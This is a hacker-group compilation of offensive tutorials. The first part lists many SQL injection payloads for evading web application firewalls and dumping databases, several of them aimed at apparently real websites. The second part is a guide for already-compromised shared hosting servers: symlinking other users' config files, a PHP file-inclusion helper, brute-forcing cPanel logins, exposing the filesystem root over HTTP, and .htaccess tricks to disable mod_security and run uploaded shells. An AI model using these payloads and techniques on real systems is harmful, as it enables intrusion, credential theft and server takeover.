INDIAN ELITE HACKERS

THIS QUERIES CAN BE USED IN NORMAL INJECTIONS,DIOS,& MANY MORE....

IF YOU GET ANY PROBLEM CONTACT US.....

WAF evasion methods for sql Injections

I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

1) id=1+UnIoN+SeLecT 1,2,3 --+

2) id=1+UnIOn/**/SeLect 1,2,3 --+

3) id=1+UNIunionON+SELselectECT 1,2,3 --+

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+

5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+

6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+

/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

div + 0
Having +1 = 0
AND+ 1 = 0
/*!and*/ +1 = 0
and( 1 )=(0 ) x
OR false the url query
id =- 1 union all select
id =null union all select
id =1 +and+ false + union +all +select
id = 9999 union all select

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//

http : //www.phm.ie/project.php?cat=Conservation'
+and(1)=(0) +union+distinct+select+ 1
and use: and 1=0 to apear column number in the page
or
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0‏)

Hard WAF bypass tips
Whitespaces :
union(select(0),version(),(0),(0),(0),(0),(0),(0),
(0))
%0Aunion%0Aselect%0A1,2,3--
/**/union/**/select/**/1,2,3--
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%20%28select%201,2,version
%28%29,4,5,6,7,8%29%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
NICE QUERY
www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+

www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bypassing ::
(Double Keyword): UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni<on all sel<ect
%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f
%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex
%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%23aa%0Aselect%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/**/
union/*!50000select*/
%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/*!
20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/%201,2,version
%28%29,4,5,6,7,8%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
false the url query :
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id= - 1 union all select
id= null union all select
id=1 +and+false+ union+all+select
id= 9999 union all select
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Order Bypassing do like this
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where
table_schema=database()
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
unhex(hex(Concat
(Column_Name,0x3e,Table_schema,0x3e,table_
Name)))
/*!from*/information_schema.columns/*!where*/
column_name%20/*!like*/char(37,%20112,%2097,
%20115,%20115,%2037)
like ::
PHP Code:
http ://www.westbury.com/
article.php?
article_id=-117%20union%20select
%201,2,unhex%28hex%28Concat
%28Column_Name,0x3e,Table_
schema, 0x3e,table_Name
%29%29%29,4,5,6,7/*!from*/
information_schema.columns/*!
where*/column_name%20/*!like*/
char%2837,%20112,%2097,%20115,
%20115,%2037%29--
user_passwd>westbur6_website>user_info
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
used with order ::
convert( using ascii) or unhex(hex())
like :
PHP Code:
www. westbury. com/ article. php?
article_id =- 117 union select 1 , 2 ,
convert ( group_concat
(table_name ) using ascii ), 4 , 5 ,6 , 7 +
from +information_schema .tables --
IF'ascii' dosent work? you can try
PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850

------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Group_Concat
group_concat ()
/*!group_concat*/ ()
grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
group_concat (, 0x3c62723e )
g % 72oup_c % 6Fncat % 28 % 76% 65rsion
% 28 %29 ,% 22 ~ BlackRose% 22 %29
CoNcAt ()
CONCAT (DISTINCT Version ())
concat (, 0x3a ,)
concat %00 ()
% 00CoNcAt ()
/*!50000cOnCat*/ ( /*!Version()*/ )
/*!50000cOnCat*/
/**//*!12345cOnCat*/ (, 0x3a ,)
concat_ws ()
concat (0x3a ,, 0x3c62723e )
/*!concat_ws(0x3a,)*/
concat_ws ( 0x3a3a3a , version()
CONCAT_WS ( CHAR ( 32, 58, 32 ), version
(),)
REVERSE( tacnoc )
binary (version ())
uncompress (compress ( version()))
aes_decrypt ( aes_encrypt ( version
(), 1), 1 )[/ b ][/ u ][/ size ][/ color ]

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
cp852
cp866
cp932
dec8
euckr
latin1
utf8
trick to appear info inside img tag
PHP Code:
concat( 0x223e3c62723e ,, 0x3c696d
67207372633d22 )
when the column is get into html tag,but its not
always inside img tag.
it could be <a> or </noscript> or anything.
like ::
PHP Code:
http ://fzszy.chinacourt.org/
public/detail.php?
id=-168' union /*!
%53elect*/ concat
(0x223e3c2f613e3c2f74643e,
version
(),0x3c6120687265663d22)--+

[DUMP DB in 1 Request]
PHP Code:
( select (@) from ( select(@:= 0x00 ),
( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
(@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
( select(@) from ( select (@:= 0x00 ),
( select (@) from ( table ) where (@) in (@:= concat
(@, 0x0a , column1 , 0x3a , column2 )))) a )

[DUMP DB in 1 Request improve]
PHP Code:
( select(@ x ) from (select (@x := 0x00 ),
( select( 0 ) from
( information_schema . columns) where
( table_schema !
= 0x696e666f726d6174696f6e5f736368656d61 )and
( 0x00 ) in(@ x := concat
(@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
like
http : //www.marinaplast.com/page.php?
id=-13 union select 1,2,(select
(@x)from(select(@x:=0x00),(select
(0)from(information_schema.colu​​
mns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and
(0x00)in(@x:=​c​oncat
(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

WHITESPACES BYPASS .
%09 %0A %0B %0C %0D %A0
get version - DB_NAME - user - HOST_NAME -
datadir
PHP Code:
version()
convert( version() using latin1 )
unhex ( hex( version()))
@@GLOBAL. VERSION
( substr
(@@version ,1 , 1 )=5 ) :: 1 true 0 fals
# like #
www. marinaplast. com/ page . php?
id =- 13 union select 1 , 2 ,( substr
(@@version ,1 , 1 )=5 ), 4, 5 --
1 it 's mean version 5 and 0 mean version 4
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=5
download good version 5
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=4
not download good version 4
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /
*!50095aaaa*/  no error v5
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /
*!40122rrrr*/ error not v4
☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,DB_NAME
(),4,5 --
www.marinaplast.com/page.php?id=vv
()
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,user
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,HOST_NAME
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,datadir(),4,5 --
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1 =0 /@@ version;--
) and 1 =@@version--
and 1 = 0 /user ;--

©Indian Elite Hackers

Hello!
readers

Today I share a tutorial on

WAF Byassing In SQL Injections

What is WAF ?
WAF stands for Web Application Firewall. It is
widely used nowadays to detect and defend
SQL Injections and Cross Site Scripting (XSS)
attacks.

How does it Work?
When WAF detects any malicious input from
end user, It gives 403 Forbidden, 406 Not
Acceptable or any Kind of Custom errors

How to bypass this things?

what to do next? we cant do our further
injection right?

Well its time to use various techniques to
bypass thing.
Some of these techniques are
mentioned below:

# Case Changing:

Most of the Waf's only filter lowercase or
higher-case keywords. We can easily evade
that kind of wafs by using alternate case.

if union select is forbidden , we can always try
UNION SELECT instead. And if both does not
work, We can try our luck with using mixture
of both. like UniOn seLeCt

# Using Comments

It is the most famous method to bypass WAF .

SQL comments really help us in many cases.

They play their important role in killing some
Waf's Restrictions. e.g

// , -- , --+ , #, -- -

# Inline Comments

Some WAF’s filter keywords like

/union\sselect/ig

We can bypass these filters by
using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,3--

Read SQLi Errors carefully. Sometimes
they left error from which we can have idea
that how waf is working on this site.
Anyways, We were talking about Filtered
Keywords. So it does not mean that waf is
only filtering union select. It may be filtering
all SQL keywords like table_name, column_name etc
So might need to apply these inline comments
on those keywords as well.

Example

http://localhost/waf.php?id=1 /*!union*/ /*!
select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!
information_schema.tables*/ /*!where*/ /*!
table_schema*/=database()--

# Double use of Keywords

Sometimes WAF removes whole keyword from
the query and execute it and throw errors
In such cases, we can use keywords in this
way

http://localhost/waf.php?id=1 UNunionION
SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario.
Im just giving a common Idea. Rest is upon
you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace

we are using between keywords. We mostly
use Spaces But space is not the only
whitespace we can use in SQL injection. We
have some other options as well
for example
+ . %20

is use for space, but we can try using one
of these whitespaces . some examples are

%09
%0A %0B %0C %0D %A0

inurl:
union%0Bselect%0B1,2,3--

# Encoding

We can always try our luck with URL encode
thing to bypass WAF. For example we can use

union select 1,/*!table_name*/,3 from
information_schema.tables where table_
schema=database()

as

union%20select%201,%2f%2a%21table_name
%2a%2f,3%20from%20information_
schema.tables%20where%20table_schema%
3Ddatabase%28%29

but sometime waf filter also filter % itself. So
we have to use double URL encoding in that
case

union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use
buffer overflow or give unexpected query /
request to trick WAF filters.
for example:

http://localhost/waf.php?id=1 and (select 1)=
(Select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
union select 1,2,3,4,5--

This thing only worked once for me. But
knowledge is Power, may be you face any
scenario that can be bypassed by using buffer
overflow

# use all above mentioned techniques together

oh!!! .... tried all those things but still its showing
NOT ACCEPTABLE or FORBIDDEN.

well its
time to use all these above mentioned
techniques combined.

For example: you can use alternative cases
with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%
0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article.
Next Time We Share Some More Tutorials on WAF bypassing.

Please
give us your feedback. So that we may be able
to make things more clear for you next time .

#Indian_Elite_Hackers

Hello Readers
Today I am going to show you

BYPASSING SYMLINK METHODS: On LINUX |
APACHE AND LITESPEED SERVERS

Requirements:

Shelled Server
Writable .htaccess

Note :

This tutorial will not work for Godaddy ,
Bluehost , Hostgrator and Hostmonstor
Servers .

Tutorial:

Firstly You Need the Following Files For This
Method:
1 -> AnonyMous KnW CGI Shell
2 -> Anonknw
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 -> Port.py
First Before Starting to symlink we need to
create php.ini and ini.php to Disable Safe
mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code

safe_mode=Off
And ini.php with
PHP Code:
<?echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "file" ]); ini_restore ("safe_mode" )
;ini_restore ( "open_basedir" );
echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "ss" ]); ?>

Download link of the files used in this method
are on the end of the tutorial .
So after creating php.ini and ini.php upload
the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN ,
CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on
Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like

/root/var/www/vhost/

where all sites will be under vhost directory .
But you wont have permission to view it so we
will create a symbolic link to root and view the
site and symlink the config files
Make a new directory in your shell example
sen then upload AnonKnw folder Then
create a
symbolic link to root .

you can manually create a symlink to
root by using the command

ln -s / root

Then You will see this
$ linking: AnonKnw.txt -> /
finishing deferred symbolic links:
.txt -> /
This means a symbolic link has been created
to / root .
Now we need to upload .htaccess use the
following
PHP Code:
Options all
DirectoryIndex Sux.html
AddType text /plain .php
AddHandler server -parsed .php

Done Bypassed Now View

/var/www/vhost/

and you will be displayed with all sites .
BYPASSING SYMLINK ON APACHE AND
LITESPEED:

Mostly when you try to symlink apache
server you will face 403 forbidden or 404
not found and 500 Internel Server Error

These can be Bypass By Using
Different .htaccess individually.
BYPASSING SYMLINK ON APACHE &
LITESPEED – Linux Servers .

First for this make a new directory in your
shell example Anonknw then upload AnonKnW.sa
and .htaccess from the AnonyMous KnW CGI shell
which i added the download link at the end of
the Tutorial

After uploading .htaccess and AnonKnW.sa to a new
directory AnonknW chmod a AnonKnW.sa to 0755
Then Open the Cgi Shell Login
(   Password :-->   anonknw0755   )
Now there are several methods to bypass 403
forbidden You need to try all the following
methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of
the hackers to bypass 403 forbidden Error .
So before we procced first you need to get
all /etc/passwd from the server so that we
can find the username and path of where the
sites are located .

Server mostly Many functions are

enabled which shows 403 forbidden when you
try to read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass

and get /etc/passwd from the server.
(I add alredy  at the last of tutorial.)
Upload the /etc/passwd bypasser shell and
get all /etc/passwd
Then Login to AnonyMous CGI Shell and create
a symbolic link to your Target

Step 1 : ln -s / root

Step 2 : ln -s /home/username/public_html/
config.php 1.shtml

Example if our site is http://www.site.com
and username is site and its WordPress

ln -s /home/site/public_html/wp-config.php
1.shtml

So we created a Symbolic link to our Target
now you need to Go to Your Shell and Edit
the .htaccess with the following
PHP Code:
Options + FollowSymlinks
DirectoryIndex itti. html
RemoveHandler . php
AddType application / octet -stream .php

Once you done this Open the 1.shtml on your
Browser and rightclick and view source .
You
will be able to View the Config .
This is the common way of Bypass 403
forbidden and Litespeed .
Now Let Me Explain You the Advanced
Method.

Method 2 : Bypassing Symlinked Config From
Cpanel:

For This You need at least One Cpanel Access
on the sever .

I will tell you how to easily
crack Cpanel .

First Run This Command :

ls /var/mail

Then you will be displayed with all username
from the server Copy all .

Now Upload Turbo Brute Force Cpanel Script
( i attached it at last of Tutorial).

Open the Script and in User Paste all the
username we got

And for Password here is the wordlist Here :

Copy All and Paste it on Password Select
Simple and Click Submit
If Your lucky you will be displayed with
cracked cpanels.
Once you got a cpanel on the server

You can
Bypass 500 Internel Server Error 403
Forbidden Error From Port :2077 and From

error-pages from file manager.
Just symlink the config

ln -s /home/user/public_html/wp-config.php
config.shtml

Login to the cpanel

Then Go to File Manager -> Error Pages

Then Choose any of these according to what
error is triggered when you open your

symlinked config

400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example “&file=400.shtml&desc=(Bad
request)

we can get the config by

“&file=config.shtml& desc=(Bad request)

BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can
just login to port 2077

Then public_html/path/config.shtml

You will be able download the config.shtml
and you can view the source .

Method 3 : Symlink Bypass via Open Port
using Python
For this First we Python to be Installed on
Server.

To check if Python is installed run this

command python -h

If its install we can use the following python
script and Bypass

#!/usr/bin/env python
# Made in AnonKnw Labs
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__==’__main__':
os.chdir(‘/’)
Handler =
SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((“”, port),
Handler)
print(“Now open this server on webbrowser at
port : ” + str(port))
print(“example: http://site.com :” + str(port))
httpd.serve_forever()

I have added the script to downloads. Now
Upload the script to the shell.
Now run this command :

python port.py

Now Open the site with port 13123

http://www.site.com:13123

Server Bypassed From Open Port .

Method 4 : Bypassing Symlink Using .ini
Method.
Login to AnonyMous KnW CGI shell normally create a
symlink to your target in .ini Extension .

ln -s /home/user/public_html/wp-config.php
config.ini

Now go to the shell and make a new file
a.shtml
Paste the following code inside it and save it

PHP Code:
<!-- #include virtual="config.ini"-->

and save it .
Now open the a.shtml in the browser and
right click and view the source . Done
Bypassed
Method 5 : Bypassing Symlink Using ReadMe
file.
Make a new directory in your shell From the
Cgi shell normally symlink the config

Code:
ln -s /home/user/public_html/config.php
config.txt

now make .htaccess with the following code .

PHP Code:
.htaccess
Options All
ReadMeName config .txt

Now when you open the directory on the
browser you will be displayed with the config
source directly .
eg : site.com/Anonknw/config.txt is your symlinked
config then when you open
http://www.site.com/AnonKnw/ you symlinked
config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to
Bypass Symlink If you will have problem
Bypassing Try all the Following .htaccess

1 – >
PHP Code:
.htaccess
Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php
2 ->
PHP Code:
.htaccess
Options All
DirectoryIndex ssss. html
addType txt . php
AddHandler txt . php< IfModule mod_
security .c >SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>

3 ->
PHP Code:
.htaccess
suPHP_ConfigPath / home/ user/ public_html /
php. ini

4 ->
PHP Code:
.htaccess
Options + FollowSymLinks
DirectoryIndex Sux.html
Options + Indexes
AddType text /plain .php
AddHandler server -parsed .php
AddType text /plain .html

5 -> .htaccess

Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php< IfModule mod_
autoindex .c > IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble</ ifModule>
< IfModule mod_security .c > SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>
.HTACCESS TO BYPASS DISABLED FUNCTIONS

This one is to make python work :
PHP Code:
.htaccess
AddType
application /x -httpd -cgi . py
AddHandler cgi - script . py
AddHandler cgi - script . py

This one is to make perl work :

PHP Code:
.htaccess
AddType application / x- httpd- cgi .pl
AddHandler cgi - script . pl
AddHandler cgi - script . pl

This one is to enable Symlink if the function is
disabled in the server :

PHP Code:
.htaccess< Directory "/home" > *** Options -
ExecCGI * ***AllowOverride
AuthConfig Indexes
Limit FileInfo
Options= IncludesNOEXEC ,Indexes ,Includes ,
MultiViews ,SymLinksIfOwnerMatch ,
FollowSymLinks</ Directory>

This one is to retrieve users permissions :

PHP Code:
.htaccess
AddType text /plain .php
Options + Indexes
DirectoryIndex filename .html

Bypass Internal Server error :

PHP Code:
.htaccess< IfModule mod_security . c>
SecFilterEngine Off SecFilterScanPOST Off </
IfModule>
Change php version:
PHP Code:
.htaccess
AddType application / x- httpd- php4 .php

Bypass Uploads Options and upload shell in
another extension :
PHP Code:
< FilesMatch "^.*.mp3" > SetHandler
application /x -httpd -php </ FilesMatch>

Retrieve Config with picture method :

PHP Code:
.htaccess
Options FollowSymLinks MultiViews Indexes
ExecCGI
AddType application / x- httpd- cgi .gif
AddHandler cgi - script . gif
AddHandler cgi - script . gif

So that’s it i think i had covered everything
thats related to Bypass Symlink and Disabled
Functions on Server .
DOWNLOAD THE SCRIPTS I HAVE USED ON
THE TUTORIAL >>Here<<
Password of zip:- ([[[[[anonknw]]]]])
(Without braces)

Hope U Enjoy Reading

Reagards

AnonyMous Knw